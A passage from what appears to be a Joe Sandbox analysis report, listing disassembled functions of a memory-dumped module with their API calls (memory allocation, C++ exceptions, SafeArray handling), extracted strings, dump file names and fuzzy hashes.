Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE52206
__CxxThrowException@8.LIBCMT ref: 6CE52221

Part of subcall function 6CE56480: __CxxThrowException@8.LIBCMT ref: 6CE56518
Part of subcall function 6CE56480: __CxxThrowException@8.LIBCMT ref: 6CE56558

Strings

@-l .l, xrefs: 6CE521AD
lQl, xrefs: 6CE520CB
ILProtector, xrefs: 6CE52045
0Bl, xrefs: 6CE52217

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw$_mallocstd::exception::exception
String ID: 0Bl$@-l .l$ILProtector$lQl
API String ID: 84431791-3114176683
Opcode ID: 27069c8feed1a2d1b1a2013b246fa15d1a10f075fe57e5c3223d72cc88603afb
Instruction ID: 6a7649f47d1364226c6a9fbddd12fc8c46b525e307ca184a3583445ce41aa981
Opcode Fuzzy Hash: 27069c8feed1a2d1b1a2013b246fa15d1a10f075fe57e5c3223d72cc88603afb
Instruction Fuzzy Hash: EB712975D05259DFCB14CFA8C984BEEBBB4BB59304F1081ADE419A7740DB306A44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE89BB5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CE89BCF

Part of subcall function 6CE89D66: __FF_MSGBANNER.LIBCMT ref: 6CE89D7F
Part of subcall function 6CE89D66: __NMSG_WRITE.LIBCMT ref: 6CE89D86
Part of subcall function 6CE89D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CE89BD4,6CE21290,CB65479A), ref: 6CE89DAB

std::exception::exception.LIBCMT ref: 6CE89C04
std::exception::exception.LIBCMT ref: 6CE89C1E
__CxxThrowException@8.LIBCMT ref: 6CE89C2F

Strings

Ql, xrefs: 6CE89BF7, 6CE89BFA
0Bl, xrefs: 6CE89BE7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: 0Bl$Ql
API String ID: 615853336-3463611079
Opcode ID: c3c13c98bad41103cf2671250b3ff9e48a55bd2d7c43c47369fbc1b7b806feb8
Instruction ID: a7a40a4636566e5a5f815b59ce9fa4018aa0c88719ca2c7d5624277ca52fdb5c
Opcode Fuzzy Hash: c3c13c98bad41103cf2671250b3ff9e48a55bd2d7c43c47369fbc1b7b806feb8
Instruction Fuzzy Hash: 98F0A431E02509AFDF00EB94CC51AED7AB8AB42B1CF34055DE418A7BD0DB719B098654

Uniqueness

Uniqueness Score: -1.00%

Function 6CE487EE Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CE469C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CE46A08
Part of subcall function 6CE469C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE46A15
Part of subcall function 6CE469C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE46A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4AEBF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 902b1d9ecbfdd9e3224b851dc96acf42f5de18da90fcd991f05acaf43eac08b1
Instruction ID: 30af2711352c7279e91e147de0192a97be80de31787d2c0b706bcb70eaf707db
Opcode Fuzzy Hash: 902b1d9ecbfdd9e3224b851dc96acf42f5de18da90fcd991f05acaf43eac08b1
Instruction Fuzzy Hash: 17314971E416189FCB10CBA8DC80B9EB7BAAF95218F70869AE419E7741C775E9808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE43A90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE43B71
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE43B83
SafeArrayDestroy.OLEAUT32(?), ref: 6CE43BCF

Strings

ljl, xrefs: 6CE43B9B, 6CE43BA4
ljl, xrefs: 6CE43AA3

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy
String ID: ljl$ljl
API String ID: 3651546500-1848646690
Opcode ID: 123fccd1428627ece8d5bc8eb0ec1a82c8044c85cdd9ed27c1571e352d2840ac
Instruction ID: 7d7497fd63efd79694c2964756890485cdd9837f5e1b8dce610779f8d21c16b0
Opcode Fuzzy Hash: 123fccd1428627ece8d5bc8eb0ec1a82c8044c85cdd9ed27c1571e352d2840ac
Instruction Fuzzy Hash: 3B41BB722086019FC600DF19C880E5AF7F9FBD8358F248A0EF8A4D7750D630ED468B92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE58D80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CE58D8A

Part of subcall function 6CE89D66: __FF_MSGBANNER.LIBCMT ref: 6CE89D7F
Part of subcall function 6CE89D66: __NMSG_WRITE.LIBCMT ref: 6CE89D86
Part of subcall function 6CE89D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CE89BD4,6CE21290,CB65479A), ref: 6CE89DAB

Part of subcall function 6CE891F6: std::_Lockit::_Lockit.LIBCPMT ref: 6CE89202

_malloc.LIBCMT ref: 6CE58DAF
std::exception::exception.LIBCMT ref: 6CE58DD4
__CxxThrowException@8.LIBCMT ref: 6CE58DEB

Strings

0Bl, xrefs: 6CE58DE3

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
String ID: 0Bl
API String ID: 3043633502-3271211234
Opcode ID: 33935e144a3181bb14625f0294fac926ee034a74d89c68387036cfc1d364b254
Instruction ID: 471e1f750bb986a718e137bc423ea3a2c37d6aa169b1866c6043d69ad76660f4
Opcode Fuzzy Hash: 33935e144a3181bb14625f0294fac926ee034a74d89c68387036cfc1d364b254
Instruction Fuzzy Hash: D7F024738062116BD211EB959C42BEF32FC9F91619FA0081DF95891B40EB22D21DC6F3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE36C60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CE36C73
SafeArrayAccessData.OLEAUT32(00000000,<ll), ref: 6CE36C87
_memmove.LIBCMT ref: 6CE36C9A
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CE36CA3

Strings

<ll, xrefs: 6CE36C64, 6CE36C7B, 6CE36C7E

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
String ID: <ll
API String ID: 3147195435-3419007484
Opcode ID: 21b1b6f6726a0418cc6b095a195195783baf816a3edf754191e161ce571db7b9
Instruction ID: c74731fe001a0143b3b6bda07d69979a116ddc0a968bfadc500cff4d42d91270
Opcode Fuzzy Hash: 21b1b6f6726a0418cc6b095a195195783baf816a3edf754191e161ce571db7b9
Instruction Fuzzy Hash: 89F05E76301224BBEB105FA1DC89F9B7BBCEFD6760F108016FA188A241E770D500DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE25450 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 257COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::tr1::_Xweak.LIBCPMT ref: 6CE256D7
std::exception::exception.LIBCMT ref: 6CE25734
__CxxThrowException@8.LIBCMT ref: 6CE2574B

Strings

0Bl, xrefs: 6CE25743

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8ThrowXweak_mallocstd::exception::exceptionstd::tr1::_
String ID: 0Bl
API String ID: 2092180293-3271211234
Opcode ID: 5d871638b261adf0643e1541298cff6e474072353b16fadede9466d869bc5184
Instruction ID: 9dbc65b791e52482b2a5c9684d2e0ba018f14465887fcc9684c1779c75ddc595
Opcode Fuzzy Hash: 5d871638b261adf0643e1541298cff6e474072353b16fadede9466d869bc5184
Instruction Fuzzy Hash: 86A12A715047018FC724CF64C480AAAB7F5FF88618F248F5EE49A8BB54E774EA49CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6CE8A42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__CRT_INIT@12.LIBCMT ref: 6CE8A463
__CRT_INIT@12.LIBCMT ref: 6CE8A493
__CRT_INIT@12.LIBCMT ref: 6CE8A4B3

Strings

a0, xrefs: 6CE8A4FF

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: T@12
String ID: a0
API String ID: 456891419-3188653782
Opcode ID: 7da42d6b8c3bcedda08bee54f52c3755687370f87c644716b6c003ff763739ba
Instruction ID: 798be4624e2b58e3a269a6f5ab2e4e152c0c22c4655e72c1e3c2d50a222656e0
Opcode Fuzzy Hash: 7da42d6b8c3bcedda08bee54f52c3755687370f87c644716b6c003ff763739ba
Instruction Fuzzy Hash: 06110370D8329669DF309AB64C4CFAFBABC9B8175DF309419E429E6BC0D638D541CA60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4C410 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE4C478
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE4C488
SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6CE4C4B4
SafeArrayDestroy.OLEAUT32(?), ref: 6CE4C512

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Bound$DestroyElement
String ID:
API String ID: 3987547017-0
Opcode ID: eeff2a49d89598cdee670696bde020e3b7e80135fd41a22a1055dfa1bd1d0a5d
Instruction ID: bc2c82572a1c47a9f0798bc65a77bddd8bb216aaa18b50efa133f521e4611412
Opcode Fuzzy Hash: eeff2a49d89598cdee670696bde020e3b7e80135fd41a22a1055dfa1bd1d0a5d
Instruction Fuzzy Hash: 9F413F71A00149EFDB00DF99D980DAEBBB8EB49354F20C569F919E7740D734AA4ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE53EB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE54042

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE54059

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C04
Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C1E
Part of subcall function 6CE89BB5: __CxxThrowException@8.LIBCMT ref: 6CE89C2F

Strings

0Bl, xrefs: 6CE54051

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
String ID: 0Bl
API String ID: 2813683038-3271211234
Opcode ID: ea62c25a5bcf758df472df2854213bf306194af062e8a5cbe627c6752d382d27
Instruction ID: 5e7532a8e92ef360afd94a9e06dfbdece79a15e44cd7de0b53d3961de96e7d04
Opcode Fuzzy Hash: ea62c25a5bcf758df472df2854213bf306194af062e8a5cbe627c6752d382d27
Instruction Fuzzy Hash: F991AEB18053009FD700CF99C842B9AFBF4AB81744F74896EE4189B7A0E3B6D514CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6CE362C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE36466

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE3647D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE36475

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: ef3f97c81c3ec745028b1b68d32b72c931adf74924729ac428d5f017a25ea182
Instruction ID: d6e07ab90203116320f72b327ec75c631377c9b3c7902c7cf4e51d99f902b731
Opcode Fuzzy Hash: ef3f97c81c3ec745028b1b68d32b72c931adf74924729ac428d5f017a25ea182
Instruction Fuzzy Hash: B3519EB29093509FD700CF68C981A9ABBF4FB85704F60592EF5998B790D371E908CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4D2E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE4D3E8
__CxxThrowException@8.LIBCMT ref: 6CE4D3FF

Strings

0Bl, xrefs: 6CE4D3F7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: b894840befe7bc5557e4d7ec3860fe9e70bb39709dc3f7f545c22f6e2a1e4665
Instruction ID: 4296eb418e16ed789d64a1e8986f00e56a4e188c01d66834008b648a99a0000f
Opcode Fuzzy Hash: b894840befe7bc5557e4d7ec3860fe9e70bb39709dc3f7f545c22f6e2a1e4665
Instruction Fuzzy Hash: 6B316D755057059FC704CF28D48099AB7F5FF89718F608A2EF4558B750E731EA0ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE38400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE38449
__CxxThrowException@8.LIBCMT ref: 6CE3845E

Strings

0Bl, xrefs: 6CE38457

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: 409ffdf7ad1c8d8abf39cd48ae149699cf2e66f324792ea99d019896dfedcaf2
Instruction ID: ab9c418dd6af5e5da8287b48325905a97902c3ebade5cdf7cc8c4852cccb6955
Opcode Fuzzy Hash: 409ffdf7ad1c8d8abf39cd48ae149699cf2e66f324792ea99d019896dfedcaf2
